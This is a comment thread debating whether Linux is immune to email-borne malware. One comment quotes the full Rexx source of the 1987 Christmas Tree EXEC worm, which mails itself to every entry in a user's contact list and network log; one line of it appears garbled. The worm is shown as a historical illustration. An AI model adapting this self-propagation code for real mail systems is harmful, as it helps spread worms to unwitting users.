The reason a Linux virus isn’t going to be very effective, even if you find a good hack, is that most Linux users send and receive most of their communications to and from non-Linux systems. Windows viruses spread so readily because anyone with a Windows system is communicating constantly and frequently with many other Windows systems.
Nice post, thanks.
Flame bait written by a moron who doesn’t know what a virus is.
...
I did like his little appendix on root escalation via patience.
Macs, by the way, are also vulnerable to the attack described. However, there is one additional level of protection: You get a warning the first time you run something downloaded from the internet. You can ignore it of course, but you do get the warning. Social engineering, remember.
The more things change, the more they stay the same. One of the original computer worms was the famous Christmas Tree EXEC of 1987, which shut down IBM's internal network by flooding it with traffic. It was written in Rexx, not bash/Python, but, like what the article describes, it depended on social engineering. It was sent to victims using the system's email facility. When a user chose to run it, it would draw a cute Christmas tree on the 3270 display and then send itself to everybody in the user's contact list.
Here's the code:
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
'VMFCLEAR'
SAY ' * '
SAY ' * '
SAY ' *** '
SAY ' ***** '
SAY ' ******* '
SAY ' ********* '
SAY ' ************* A'
SAY ' ******* '
SAY ' *********** VERY'
SAY ' *************** '
SAY ' ******************* HAPPY'
SAY ' *********** '
SAY ' *************** CHRISTMAS'
SAY ' ******************* '
SAY ' *********************** AND MY'
SAY ' *************** '
SAY ' ******************* BEST WISHES'
SAY ' *********************** '
SAY ' *************************** FOR THE NEXT'
SAY ' ****** '
SAY ' ****** YEAR'
SAY ' ****** '
/* browsing this file is no fun at all just type CHRISTMAS from cms */
dropbuf
makebuf
"q t (stack"
pull d1 d2 d3 d4 d5 dat
pull zeile
jeah = substr(dat,7,2)
tack = substr(dat,4,2)
mohn = substr(dat,1,2)
if jeah <= 88 then do
  if mohn <2 ] mohn = 12 then do
    DROPBUF
    MAKEBUF
    "IDENTIFY ( FIFO"
    PULL WER VON WO IST REST
    DROPBUF
    MAKEBUF
    "EXECIO * DISKR " WER " NAMES A (FIFO"
    DO WHILE QUEUED() > 0
      PULL NICK NAME ORT
      NAM = INDEX(NAME,'.')+1
      IF NAM > 0 THEN DO
        NAME = SUBSTR(NAME,NAM)
      END
      NAM = INDEX(ORT,'.')+1
      IF NAM > 0 THEN DO
        ORT = SUBSTR(ORT,NAM)
      END
      IF LENGTH(NAME)>0 THEN DO
        IF LENGTH(ORT) = 0 THEN DO
          ORT = WO
        END
        if name ^= "RELAY" then do
          "SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
        end
      END
    END
    DROPBUF
    MAKEBUF
    ANZ = 1
    "EXECIO * DISKR " WER " NETLOG A (FIFO"
    DO WHILE QUEUED() > 0
      PULL KIND FN FT FM ACT FROM ID AT NODE REST
      IF ACT = 'SENT' THEN DO
        IF ANZ = 1 THEN DO
          OK.ANZ = ID
        END
        IF ANZ > 1 THEN DO
          OK.ANZ = ID
          NIXIS = 0
          DO I = 1 TO ANZ-1
            IF OK.I = ID THEN DO
              NIXIS = 1
            END
          END
        END
        ANZ = ANZ + 1
        IF NIXIS = 0 THEN DO
          "SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
        END
      END
    END
    DROPBUF
  END
end
end
This is describing a trojan, not a virus.
The entire premise of this article is predicated upon the assumption that the user takes some stupid action (like executing an attachment from an email).
The problem with Windows has always been more than just stupid user actions. Windows has been vulnerable to viruses, worms, trojans, malware, etc., without the user taking any stupid actions at all.
bkmk
“Therefore, we are told, the very architecture of Linux is so much more superior to Windows that it’s just not possible to successfully spread malware. Of course it is acknowledged a low-level bug, a buffer overflow or other issue is exploitable. But nevertheless, users can’t just catch a virus by email or downloading malware from the Internet, contrary to those Windows users. Linux will protect them from their own stupidity.”
What a huge straw man... There is a difference between ‘impossible’ and ‘more difficult’ which this article totally ignores.